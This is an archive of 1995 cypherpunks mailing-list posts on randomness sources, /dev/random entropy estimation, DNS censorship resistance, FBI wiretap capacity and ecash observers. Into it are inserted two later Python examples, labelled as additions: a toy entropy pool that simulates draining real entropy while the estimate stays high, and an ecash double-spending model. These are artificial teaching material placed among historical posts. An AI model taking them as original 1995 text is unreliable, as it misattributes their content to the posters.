surveillance becomes impossible.  Why should wiretaps be any
different?  Strong crypto is the "cone of silence" for digital
transmission.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 3 Nov 1995 12:13:39 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <Pine.ULT.3.91.951102013958.18049A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.LNX.3.91.951103114116.20782B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 Nov 1995, Rich Graves wrote:

> > 
> >    In Hong Kong, the Internet wasn't quite strangled, but the British
> > authorities who control that colony managed to throttle free electronic
> > speech with the rest of the world until everything was bottlenecked into
> > a few little-known satellite links.
> 
> Hmm, few specifics here. I wonder if they would care to elaborate. Nah.

Don't waste your time with that idiot, he doesn't know what he's talking
about. The 1-week partial black-out here in Hong Kong happened because some
providers had ignored some licencing requirements, and has been quickly
solved once they agreed to comply.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usura@berserk.com (Alex de Joode)
Date: Fri, 3 Nov 1995 19:32:08 +0800
To: cypherpunks@toad.com
Subject: Re: Radiation Detectors from Aware Electronics
Message-ID: <g4NZDD1w165w@asylum.berserk.com>
MIME-Version: 1.0
Content-Type: text/plain


sharborth@hai-net.com writes in a followup to perry@piermont.com:
....
:: There have been several requests for information on the company that 
:: makes the radiation detectors with RS232 interfaces that I mentioned.
[..]
:: Perry
: 
:      So what does this have to do with this mailing list??
:      Skip

The cypherpunks mailing list has a lot to do with cryptography.
An important element of cryptography is randomness. One way that
seems to be a superior source for obtaining random data is 
radioactive decay; radiation detectors which have an RS232 interface 
can be hooked up to a computer and thus act as a source of randomness.

    -AJ-
--
kill -9 hkk@netcom.com .. process killed .. lawyer terminated successfully




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 12:13:04 +0800
To: hallam@w3.org
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <9511031621.AA11770@zorch.w3.org>
Message-ID: <199511031659.LAA08943@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I strongly disagree with Mr. Hallam, but I am replying in private
mail. This is far off the topic of the list.

hallam@w3.org writes:
> 
> >>Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
> >>by people as well as EARNED by people.  Most payers have easily 
> >>detectible physical presence and assets that can easily be attached by 
> >>regulators.   It will be a cold day before, e.g., my employer agrees not 
> >>to report my earnings.  And the same is true for most employers in most 
> >>industries.  
> 
> >Unfortunately, this is true, at least for people whose employers are
> >subject to income tax somewhere.  Taxing businesses doesn't make sense
> >economically - you could collect almost as much money with far less disruption
> >to the underlying economy by taxing it as wages for workers and
> 
> Why unfortunately? I happen to consider that our modern social economy
> is a high point of civilisation. It is certainly a tremendous achievement.
> We can educate the entire population, provide them with health care,
> prevent famine and provide protection against crime and aggression by
> other states. All in all rather a good deal.
> 
> While one might wish to personally avoid paying taxes there are no benefits if 
> everyone avoids paying taxes. There are significant areas of the economy
> which can only be funded through social mandates, roads for example.
> While there are fringe political elements who put forward alternative models
> I find them no more convincing than the claims of the Marxists who made
> similarly ideologically based assertions not so long ago. There have at 
> least been examples of Marxist states, even though they were not particularly
> successful and rapidly degenerated into dictatorships.
> 
> 
> I find the libertopian obsession with government oppression and complete
> indifference towards corporate exploitation unsatisfactory. The truth is
> that both are inevitably interlinked. For the "libertarian" it is 
> unsatisfactory for the government to exploit consumers of utilities but
> entirely satisfactory for corporations to do so should they have the chance.
> The theoretical possibility of competition making this acceptable even
> where there is no actual competition and hence no choice. This 
> corporativist model accepts suppression of freedom provided it is to
> commercial goals.
> 
> Consider the linkage between direct mail advertising and surveillance. It
> is uneconomic for a government to trace the movements of every citizen.
> The communist countries were brought down as much by the cost of the huge
> surveillance administrations they constructed as anything else. In the
> West we do not have government surveillance, we have direct mail marketers
> do the job for government. Surveillance is made economic by getting the
> citizen to subsidise it. It is naturally open for the government to apply
> information collected by these people for their own purposes. It is a 
> salable commodity and the government is a willing buyer. Furthermore there
> is a sophisticated infrastructure in place to achieve these ends.
> 
> The extent of corporate surveillance goes unnoticed by most citizens. Few
> people realise that when they use their credit card in a supermarket they
> are supplying a direct mail marketing company with a profile of their
> spending patterns. They are also providing a statement of where they are,
> and indirectly their income, residence etc.
> 
> What is needed is stringent data protection laws which enforce the 
> confidentiality of personal information. Note that both the SEPP and
> STT payments systems conceal the credit card number from the merchant.
> Cryptographic locks on individual parts of the picture are insufficient 
> however. What is needed is laws which make the financing of the 
> underlying architecture uneconomic.
> 
> 		Phill
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 4 Nov 1995 12:12:48 +0800
To: tomw@cthulhu.engr.sgi.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199511021747.JAA08919@orac.engr.sgi.com>
Message-ID: <199511031805.NAA09698@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein writes:
>In article <DHEtE6.FB6@sgi.sgi.com>, Mark Murray <mark@grondar.za> writes:
>> I chatted with a colleague at work, and he helped bend my mind right.
>> I had the mistaken notion that adding lots of data would "overflow"
>> and "dilute" the entropy to an attackable state.
>
>I think the problem is not merely flooding the device with non-random
>input data.  If you coordinate sucking out entropy with feeding in
>non-random data you can suck the real entropy in the system down to zero
>while making the driver think it has plenty of randomness.  While it's
>not clear to me how this would lead to an attack, it would be worrisome.

You need a similar "mind bending".  "Feeding in non-random data"
doesn't lead to the driver thinking it has "plenty of randomness" left,
since it doesn't increase the entropy level to counteract the decrease
from the entropy-sucker.

The hard part would be having the driver figure out how much entropy
it's getting from the input.  "Non-random" implies some sort of
correlation between the bits.  I can't think of any way of measuring
that which doesn't make some sort of "horizon" that a malicious user
can confuse.

The simple mechanism would be to assume that input from untrusted users
adds no entropy, forcing entropy estimates to represent a lower bound.
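
Added example (not part of the original message, and not the Linux or FreeBSD driver code): a toy pool in Python comparing the rule proposed above, crediting nothing for untrusted input, with a driver that believes the writer's claim. The class and function names, the SHA-256 mixing, the 256-bit cap and the seed bytes are assumptions made for the illustration.

```python
import hashlib

POOL_BITS = 256  # assumed pool size for this model


class EntropyPool:
    """Toy /dev/random-style pool: a hashed state plus an entropy estimate."""

    def __init__(self, credit_untrusted):
        self.state = b"\x00" * 32
        self.estimate_bits = 0                  # what the driver believes it holds
        self.credit_untrusted = credit_untrusted

    def add(self, data, claimed_bits, trusted):
        # Input is always mixed in: extra data cannot remove what is already
        # in the pool, which is why flooding does not "dilute" it.
        self.state = hashlib.sha256(self.state + data).digest()
        # The policy decision is only about the estimate. With
        # credit_untrusted=False the estimate stays a lower bound.
        if trusted or self.credit_untrusted:
            self.estimate_bits = min(POOL_BITS, self.estimate_bits + claimed_bits)

    def extract(self, nbytes):
        want = nbytes * 8
        if want > self.estimate_bits:
            raise BlockingIOError("not enough estimated entropy")
        self.estimate_bits -= want
        out = hashlib.sha256(b"out" + self.state).digest()[:nbytes]
        # Step the state so the output does not reveal the next state.
        self.state = hashlib.sha256(b"next" + self.state).digest()
        return out


def drain_and_feed(pool, rounds=5):
    """Model the coordinated user from the quoted message.

    Each round reads 128 bits and then writes 16 constant bytes while
    claiming they are worth 128 bits. Returns (reads served, driver
    estimate, real entropy left), where the last value is ground truth
    that only this model knows.
    """
    real_bits = 128
    # Constructed seed standing in for 128 bits from a trusted source.
    pool.add(bytes(range(16)), 128, trusted=True)
    served = 0
    for _ in range(rounds):
        try:
            pool.extract(16)
        except BlockingIOError:
            break                               # the reader would block here
        served += 1
        real_bits = max(0, real_bits - 128)
        pool.add(b"\x00" * 16, 128, trusted=False)
    return served, pool.estimate_bits, real_bits


if __name__ == "__main__":
    print("credits untrusted input:", drain_and_feed(EntropyPool(True)))
    print("lower-bound estimate:   ", drain_and_feed(EntropyPool(False)))
```

With the estimate kept as a lower bound the second read blocks; the driver that credits untrusted writes keeps serving reads while its estimate stays at 128 and the modelled real entropy is zero.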




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 5 Nov 1995 01:02:05 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: video as a source of public randomness
In-Reply-To: <acbf861a06021004706b@[205.199.118.202]>
Message-ID: <199511031708.MAA08978@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> I  don't plan to belabor this point. Radioactive decay sources are
> certainly fine, though not likely to be purchased by most people.

Video digitization equipment connected to TV tuners turned to dead air,
your suggestion, are equally unlikely to be purchased by most
people. The geiger counters are very simple and cheap, too.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 04:49:03 +0800
To: cypherpunks@toad.com
Subject: Many Topics are Appropriate for Discussion Here
Message-ID: <acbf9ee00b0210044261@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 PM 11/3/95, Perry E. Metzger wrote:

>Look, it's simple. If you want the FBI and NSA to win, post lots of
>crap here. Nothing will help them out more than clogging one of the
>few communications channels available to people interested in
>spreading cryptography. If you are really successful, all the smart
>people will leave (as has happened in waves before -- the losses of
>Steve Bellovin and (effectively) Phil Karn are still felt) and you
>will have totally destroyed the channel.

There have been many posts which are more "clogging" than some minor
conspiracy rants. And if people don't want to respond to these rants,
they'll decline. Far more serious, in my opinion of course, are the
cross-posts to multiple mailing lists and the various press releases and
position papers bombarding us.

Implying that the reason Bellovin and Karn left the list--if they did, as I
haven't checked--was because of "off-topic" posts seems to be a stretch.
Even if Perry has gotten assurances from them personally that the
"off-topic" posts were a major factor, I'm not sure much can be concluded
from this. People leave for all sorts of reasons. I don't know what
reasons, if any, were responsible for the unsubscribings (or at least
nonpostings) of Bellovin or Karn, but I'm not too sure it matters.

I don't think it is useful to speculate on the causes for specific people
leaving the list, or even to ask them why they left. If they feel it is
important for us to know that they left the list because of too much talk
about UFOs, or about IETF committees, or about Netscape breakages, they can
tell us in their departing message.

Certainly using the departure of J. Random Subscriber, or even R. Noted
Hacker, as "proof" that topics are inappropriate is flawed logic. "We've
lost fine subscribers like Phil Zimmermann because of crap posted here." I
suspect there's some fancy Latin name for this kind of appeal to authority.

Topics have always been in flux, which is almost certainly a good thing,
else a lot of us would have left a long time ago. Certainly those
interested in some topics have little if any interest in other topics.

Lots of other people have joined the list, and the subscription base has
gone from an earlier plateau of about 700 subscribers to more than 1200
recently. And many of the current subscribers are very active in
cryptography and security. I'd be tempted to mention a half dozen or so
names, but anyone I left out might feel slighted.

I do agree with Perry that longish political essays are probably not the
_best_ material for this list, though thoughtful essays on the implications
of digital cash, such as several folks have written about, are always
useful. And there are many troubling aspects of "crypto anarchy" that need
more explication, something I always feel is appropriate for this list.

I am much less bothered by _custom written_ essays by current subscribers,
whatever the topic, than by reposts of long articles from other lists.
Thus, occasional rants from list members are preferable, to me, to longish
essays from outsiders, generally speaking.

Political aspects of strong cryptography have always been important to this
list. Though new subscribers may be forgiven for thinking this is the
"Netscape bug list," such has not always been the case. Key escrow was a
dominant topic in the early days, as it is today. And there are massive
numbers of issues to be discussed in the digital money area, involving
banking laws, the role of intelligence agencies in desiring to monitor cash
flows, the legal implications of anonymous cash, and scads of technical
issues.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 5 Nov 1995 01:02:25 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Physician, Heal Thyself
In-Reply-To: <acbf8c7e08021004f0bb@[205.199.118.202]>
Message-ID: <199511031738.MAA00170@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> >Tim May will doubtless disagree, but he has nothing else to do in life
>                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >than read the net so his incentives to see traffic minimized aren't
> >the same as other people's.
> 
> Perry, would you please knock off the drone of snide remarks about
> me?

It wasn't a snide remark. I believe that the fact that you are retired
and spend a considerable fraction of your day reading news and mail
alters your perspective about what is reasonable.

BTW, I thought I was in your kill file.

> You are often quick to say "What has this got to do with Cypherpunks?," but
> you yourself are perfectly willing to rant on about Nietzsche, the East
> Germans, and Louis Freeh. Physician, heal thyself.

You frequently say this sort of thing, but it's groundless. My
Nietzsche comment was a sarcastic side remark and not a discussion of
Nietzsche -- I refused, in fact, to discuss him. Mentions about the
FBI's new telephony tapping requirements are on topic provided they
aren't excessive, as are comments on a wide variety of cryptography
and security related topics.

What I object to is noise. Postings about Waco, IBM microkernel
operating systems, INSLAW, and libertarianism aren't on topic. A
message noting that there is a hearing in the Bernstein trial (as with
John Gilmore), brief notices about the availability of online articles
on topics of interest (as with John Young), etc, are all perfectly in
order. It's when people start posting garbage that has nothing to do
with local discussion (such as whether socialism is good) that I get
mad. I think that this is not a difficult line to understand.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 4 Nov 1995 12:03:34 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Kallstrom Calls All Calls Tappable
In-Reply-To: <199511031441.JAA18237@pipe2.nyc.pipeline.com>
Message-ID: <199511031743.MAA12656@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


James Kallstrom (FBI-NY) in The Washington Post:
>    "We've never done that many" taps at one time, he said. But
>    in a "worst-case scenario," such as a major act of
>    terrorism, the agency might need such ability, he said. "I
>    think it's a reasonable, minimal, conservative number."

In other words, they'll "round up the usual suspects" ?  Mr. Sose
to a White Courtesy Telephone, please.

The argument above is very different (and IMHO much less defensible for the
FBI) than the claim that the LEAs will in general have more investigations in
progress that require wiretapping. A gradual increase in wiretap orders in
a given area could plausibly happen as more and more interesting traffic
goes over the wire. But a sudden jump in activity after a crime has been
committed looks like a big fishing expedition. In particular, I fear that
judges will be more disposed to sign stacks of wiretap orders 
indiscriminately in the aftermath of a major act of violence.

-Futplex <futplex@pseudonym.com>

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 4 Nov 1995 10:53:01 +0800
To: cypherpunks@toad.com
Subject: consumer products that make nice sources
Message-ID: <Pine.SOL.3.91.951103124506.27341A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 3 Nov 1995 10:34:00 -0500 (EST)
>From: Brad Dolan <bdolan@use.usit.net>
>To: s1113645@tesla.cc.uottawa.ca
>Cc: "Perry E. Metzger" <perry@piermont.com>, cypherpunks@toad.com
>Subject: Re: Sources of randomness 
>
>
>> What prices have you got listed? Is the equipment sensitive enough to get 
>> lots of entropy from a normal environment or do you need artificial sources
>> of radioactivity? (easy, safe and cheap enough to get?)


The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred.  
I think the following is the right phone number.

Sunshine Mine is an amusing concept.  People pay money to go breathe radon
there, while others are spending much money avoiding radon.

Anyway, the pillows make nice sources and good conversation pieces.

bd


>Safe, easy-to-obtain gamma sources:  orange fiesta-ware pottery (at flea 
>markets), old-style Coleman lantern mantles (not sure about the new 
>ones), uranium-ore "health pillows" (Sunshine Mine, 408-225-3670).
                                                     ^^^
                                                     406







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 12:09:50 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: video as a source of public randomness
In-Reply-To: <acbf9287090210045bcb@[205.199.118.202]>
Message-ID: <199511031747.MAA00192@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



[I understand that this isn't your suggestion...]

Timothy C. May writes:
> I was commenting on the sources of randomness, such as atmospheric RF
> variations, antenna configuration, tuner sensitivity, amplifier noise,
> etc., that would make prediction of snow bits very difficult.

I feel leery about these things if only because, as I've noted, trying
to get these things "just right" and make sure that you are getting
noise and not, say, high frequency hum from your own switching power
supply, is very hard. You can set up a geiger counter if you are
merely moderately competent. I don't know who I would trust to do
analog stuff "just right". Do things a little wrong, and you merely
have a huge search space and not an impossibly huge one -- the sort of
toehold cryptanalysts want.

> I have no brief with any of the proposed schemes: nearly any are better
> than what we have now, if widely deployed and suitably used.

Agreed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sat, 4 Nov 1995 05:17:23 +0800
To: perry@piermont.com
Subject: Re: video as a source of public randomness
Message-ID: <v02130503acc01193c4a4@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:08 PM 11/3/95, Perry E. Metzger wrote:

>Timothy C. May writes:
>> I  don't plan to belabor this point. Radioactive decay sources are
>> certainly fine, though not likely to be purchased by most people.
>
>Video digitization equipment connected to TV tuners turned to dead air,
>your suggestion, are equally unlikely to be purchased by most
>people. The geiger counters are very simple and cheap, too.
>
>Perry

Well, it's true that video digitization equipment _used_ to be unlikely to
be purchased. Now, it is often standard equipment. I recently purchased a
Mac Performa for a Customer Support desk. We chose a cheaper model that came
with a built-in video tuner. It came with a _remote control_ that would allow
you to switch channels and adjust the volume just like a regular remote. It
was very nicely integrated and ready to suck down signal from an antenna.

While I haven't hacked that part of the Mac kernel, I would not be surprised
if it was easy to turn the signal into a Quicktime video file ready for
hashing.

This was, incidentally, one of the cheaper Performas available at the time.
Your mileage may vary because Apple is really flipping all over the place on
features. But, now that the cold war is over, I don't expect them to be
offering the Radiation Manager plug-in any time soon.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Noah Brodbeck <nbrodbeck@hollandhart.com>
Date: Sun, 5 Nov 1995 12:41:27 +0800
To: cypherpunks@toad.com
Subject: Telephone switch capacity
Message-ID: <s09a2bef.049@allegro.net>
MIME-Version: 1.0
Content-Type: text/plain


	Please be aware that the current capacity of the
telephone system in the United States (and for that matter,
most of the developed world) is only capable of supporting
between 15 and 20 percent simultaneous telephone
conversations.  If the FBI wishes to set up a system that is
capable of monitoring 1% of the total number of lines, that
equates to an ability to tap 5%, not 1% of all calls in progress.

>As the FBI's "interest" shifts from area to area, the whole
>country could rapidly come under the 1% surveillance
>directive.
>1.5 million telephone intercepts.  Or more.

								-=- Noah





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 4 Nov 1995 21:17:46 +0800
To: Sten Drescher <dreschs@mpd.tandem.com>
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <199511032037.PAA13172@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Sten Drescher writes:
>sameer <sameer@c2.org> said:
>> 	The US govt. doesn't run the root nameservers, nor are all the
>> root nameservers within US jurisdiction.
>
>	Granted, the US Govt doesn't run the US-based root servers.
>But, if an Internet 'Decency' law was passed, they certainly could try
>to threaten the US-based root server maintainers to make the cascading
>threats.  And, as I understand the way DNS resolution works, address
>requests go down to your root domain then up from the other root domain,
>i.e., for me to find out what c2.org's address is, my system requests
>from:
>NS mpd.tandem.com
>NS tandem.com
>NS com
>NS org
>
>If this is correct, if the com NS has the entry for the org NS, I won't
>be able to resolve those names.  Of course, explicit IP addresses and
>/etc/hosts entries would still work.

It isn't correct.  First, your host is immediately looking for a
nameserver for c2.org, by querying its configured default server (say,
piaget.mpd.tandem.com) for it.  If the server already has the answer
cached, it's returned immediately.  If not, a bit in the query tells it
whether the client wants it to find the answer or return an "I don't
know" answer -- most want it to find an answer.

Piaget.mpd.tandem.com probably already knows enough to bypass queries
to the tandem.com and com domains, since it's probably already resolved
at least one org query.  It can then go directly to a server for org to
get the c2.org information the client requested.

The other confused point you have is that there isn't just *one* server
for org.  There are at least a dozen interchangeable root nameservers
which handle all of com, org, edu, net, mil, gov, and the country
domains (us, uk, de, etc).

It's been a matter of policy for quite some time now that to register a
sub-domain under one of the top level domains (i.e., to register c2.org
under org) you must demonstrate two accessible nameservers for the new
domain.  I note, for example, that mpd.tandem.com has *four*
nameservers.

To eliminate "tandem.com" from the DNS, all of the dozen or more root
nameservers, which are in different jurisdictions, must be
compromised.  Even then, sub-domains of the top level generally offer
very long expiration periods for cached data.  It could be years before
the data left the cache from some of the second level servers, assuming
they stayed up that long.

It would almost certainly be long enough to get a judge to slap an
injunction against the action.

Once again, the net interprets censorship as damage and routes around it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 04:47:54 +0800
To: cypherpunks@toad.com
Subject: Re: Webernet Madne$$
In-Reply-To: <199511031826.TAA29048@utopia.hacktic.nl>
Message-ID: <199511031940.OAA00303@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This is an example of what I've been talking about. This really isn't
a cypherpunks topic. I spent lots of time reading that article trying
to find references to cryptography, security, payment systems, or
anything else, and it contained none of them. Why post this here and
waste our time?

.pm

Anonymous writes:
> Wall Street Journal, November 3, 1995
> 
> 
> Wall Street is in the throes of Internet mania. Or is it
> Internet madness?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 04:35:49 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <acbf9ee00b0210044261@[205.199.118.202]>
Message-ID: <199511031947.OAA00318@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Implying that the reason Bellovin and Karn left the list--if they did, as I
> haven't checked--was because of "off-topic" posts seems to be a stretch.

They both left because the noise level was too high and the
cryptography content too low. I'll ask Steve to comment if you insist.

> Certainly using the departure of J. Random Subscriber, or even R. Noted
> Hacker, as "proof" that topics are inappropriate is flawed logic. "We've
> lost fine subscribers like Phil Zimmermann because of crap posted here." I
> suspect there's some fancy Latin name for this kind of appeal to authority.

The point of this list is to provide the community of people who are
interested in cryptography and its application to further personal
freedom to congregate and exchange information. If important members
of that community -- people with important input to give -- cease to
be here because of the noise level, then we most certainly are not
meeting our goal. It's not a question of appeal to authority, except
that we want this list to appeal (in the other sense) to authorities
in this field.

> Lots of other people have joined the list, and the subscription base has
> gone from an earlier plateau of about 700 subscribers to more than 1200
> recently.

I don't care about quantity. Steve Bellovin is worth 500 subscribers
-- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
lot of this stuff than most of what passes for careful thought from
the average person here.

> Political aspects of strong cryptography have always been important to this
> list. Though new subscribers may be forgiven for thinking this is the
> "Netscape bug list," such has not always been the case. Key escrow was a
> dominant topic in the early days, as it is today.

Key Escrow is a fine topic of conversation. My problem is when someone
posts a long and totally irrelevant article about the value of
internet stocks to the list, as just happened.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 4 Nov 1995 21:16:47 +0800
To: lvhove&vnet3.vub.ac.be@vnet3.vub.ac.be (Leo Van Hove)
Subject: Re: Info needed on observers
In-Reply-To: <v01530501acbea2598fe2@[134.184.16.171]>
Message-ID: <199511032049.PAA13455@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Leo Van Hove writes:
>I am currently preparing a paper on payment systems for the Internet
>and related issues.  I recently found out that so-called observers could
>be placed on smart cards (in order to prevent double spending, or even to
>prevent people from cheating on taxes...).
>
>To be honest that's about all I know about observers and I am very eager
>to find out more.  I am, however, having a hard time finding interesting
>references on this subject.
>
>Hence, all suggestions to get me started would be extremely welcome.
>Questions of particular interest are: possible functions (and limits),
>how 'real' are they already?, what about privacy?, ...

With ecash it's possible to duplicate a coin and spend it twice ---
it's not really any different than copying a file and printing each
copy, after all.  In most ecash schemes, the double-spender can be
detected and identified when the coins are deposited, but this could be
long enough for him to disappear, leaving the bank or the payee holding
the bag.

An "observer" is designed to create a prior restraint to
double-spending.  The observer is a tamper-resistant smart card that
must be involved in all coin transfers.  When the coin is withdrawn
from the bank, the observer's signature is needed to validate it.  When
the coin is spent, the *same* observer's signature is again needed to
validate it.  The observer won't sign the same coin twice during the
spend protocol.

To double-spend with an observer present, you'd need to bypass the
tamper resistance.
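
Added example (not part of the original message and not any real ecash protocol): a Python model of the difference described above between detecting a double spend at deposit time and an observer that refuses to sign the same coin twice. HMAC-SHA256 stands in for both the bank's and the observer's public-key signatures, and the keys, names and coin id are constructed for the illustration.

```python
import hashlib
import hmac

BANK_KEY = b"constructed-bank-key"          # sample values, not real keys
OBSERVER_KEY = b"constructed-observer-key"


def _mac(key, *parts):
    # Stand-in for a signature; a real scheme would use public-key signatures
    # so that a payee could verify without holding the signing key.
    return hmac.new(key, b"|".join(parts), hashlib.sha256).digest()


class Bank:
    def __init__(self, key):
        self._key = key
        self._deposited = set()

    def issue(self, coin_id):
        return _mac(self._key, b"coin", coin_id)

    def valid(self, coin_id, sig):
        return hmac.compare_digest(sig, _mac(self._key, b"coin", coin_id))

    def deposit(self, coin_id, sig):
        if not self.valid(coin_id, sig):
            return "rejected"
        if coin_id in self._deposited:
            return "double-spend detected"  # only after the goods are gone
        self._deposited.add(coin_id)
        return "accepted"


class Observer:
    """Models the tamper-resistant card: its key and spent list stay inside."""

    def __init__(self, key):
        self._key = key
        self._withdrawn = set()
        self._spent = set()

    def countersign_withdrawal(self, coin_id):
        self._withdrawn.add(coin_id)
        return _mac(self._key, b"withdraw", coin_id)

    def sign_spend(self, coin_id, payee):
        if coin_id not in self._withdrawn:
            raise PermissionError("coin was not withdrawn through this observer")
        if coin_id in self._spent:
            raise PermissionError("observer will not sign the same coin twice")
        self._spent.add(coin_id)
        return _mac(self._key, b"spend", coin_id, payee)


def verify_spend(key, coin_id, payee, withdraw_tag, spend_tag):
    # The payee's check that the *same* observer signed both steps.
    return (hmac.compare_digest(withdraw_tag, _mac(key, b"withdraw", coin_id))
            and hmac.compare_digest(spend_tag, _mac(key, b"spend", coin_id, payee)))


def spend_without_observer():
    bank = Bank(BANK_KEY)
    coin = b"coin-0001"
    sig = bank.issue(coin)
    copies = [(coin, sig), (coin, sig)]     # duplicating a coin is copying bytes
    accepted = [bank.valid(c, s) for c, s in copies]    # each payee's own check
    deposits = [bank.deposit(c, s) for c, s in copies]  # caught only here
    return accepted, deposits


def spend_with_observer():
    bank = Bank(BANK_KEY)
    card = Observer(OBSERVER_KEY)
    coin = b"coin-0001"
    sig = bank.issue(coin)
    wtag = card.countersign_withdrawal(coin)
    accepted = []
    for payee in (b"payee-1", b"payee-2"):  # the same coin offered twice
        try:
            stag = card.sign_spend(coin, payee)
        except PermissionError:
            accepted.append(False)          # payment stops before it happens
            continue
        accepted.append(bank.valid(coin, sig)
                        and verify_spend(OBSERVER_KEY, coin, payee, wtag, stag))
    return accepted


if __name__ == "__main__":
    print(spend_without_observer())
    print(spend_with_observer())
```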




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 4 Nov 1995 06:27:04 +0800
To: Noah Brodbeck <nbrodbeck@hollandhart.com>
Subject: Telephone switch capacity
In-Reply-To: <s09a2bef.049@allegro.net>
Message-ID: <9511032051.AA14124@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Noah Brodbeck writes:
 > 	Please be aware that the current capacity of the
 > telephone system in the United States (and for that matter,
 > most of the developed world) is only capable of supporting
 > between 15 and 20 percent simultaneous telephone
 > conversations.  If the FBI wishes to set up a system that is
 > capable of monitoring 1% of the total number of lines, that
 > equates to an ability to tap 5%, not 1% of all calls in progress.
 > 

According to an article that was out on the AP newswire (check under
<URL:http://http://www1.trib.com/WIRE/CURRENT/>), the "1%" figure
applies to actual capacity.  In other words, if there's a switch with
50K subscribers but actual capacity for 5K simultaneous calls, the FBI
wants to be able to make 50 simultaneous taps.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 5 Nov 1995 02:16:09 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: alt.anonymous.messages considered harmful
Message-ID: <199511032022.PAA03575@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> >Specifically, if HTTP transactions with
> >a popular web server were routinely encrypted, then all reasonably long
> >visits to that site would act as cover traffic for a message pool on that
> >server.
> 
> Qua?  The "length" of the visit is just the time to download a document.
> Leaving a page in the browser window doesn't generate traffic...

